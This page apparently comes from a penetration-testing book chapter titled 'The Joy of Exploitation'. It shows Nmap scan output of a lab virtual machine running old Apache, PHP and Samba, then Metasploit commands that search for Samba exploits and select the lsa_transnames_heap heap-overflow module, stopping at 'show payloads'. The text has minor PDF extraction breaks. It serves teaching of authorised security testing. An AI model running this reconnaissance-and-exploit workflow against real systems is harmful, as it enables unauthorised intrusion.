background image

The Joy of Exploitation

69

Starting Nmap 5.20 ( http://nmap.org ) at 2011-03-15 19:35 EDT
Warning: Traceroute does not support idle or connect scan, disabling...
Nmap scan report for 192.168.33.132
Host is up (0.00048s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE     VERSION

80/tcp  open

  http        Apache httpd 2.2.3 ((

Ubuntu

) PHP/5.2.1)

|_html-title: Index of /

139/tcp open

  netbios-ssn 

Samba

 smbd 3.X (workgroup: MSHOME)

445/tcp open

  netbios-ssn 

Samba

 smbd 3.X (workgroup: MSHOME)

MAC Address: 00:0C:29:21:AD:08 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).

. . . SNIP . . .

Host script results:
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
|   OS: Unix (Samba 3.0.24)
|   Name: MSHOME\Unknown
|_  System time: 2011-03-15 17:39:57 UTC-4

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.11 seconds

We see three open ports: 80, 139, and 445. The message at   tells us that 

the system is running Ubuntu, and at   we see that it is running a version of 
Samba 3.

x

 and Apache 2.2.3 with PHP 5.2.1.

Let’s search for a Samba exploit and try it against the system:

msf > 

search samba

[*] Searching loaded modules for pattern 'samba'...

Auxiliary
=========
   Name                               Rank    Description
   ----                               ----    -----------
   admin/smb/samba_symlink_traversal  normal  Samba Symlink Directory Traversal
   dos/samba/lsa_addprivs_heap        normal  Samba lsa_io_privilege_set Heap Overflow
   dos/samba/lsa_transnames_heap      normal  Samba lsa_io_trans_names Heap

 Overflow

Exploits
========

   Name                                 Rank       Description
   ----                                 ----       -----------

   linux/samba/lsa_transnames_heap      good       Samba lsa_io_trans_names . . .

. . . SNIP . . .

msf > 

use linux/samba/lsa_transnames_heap

msf exploit(lsa_transnames_heap) > 

show payloads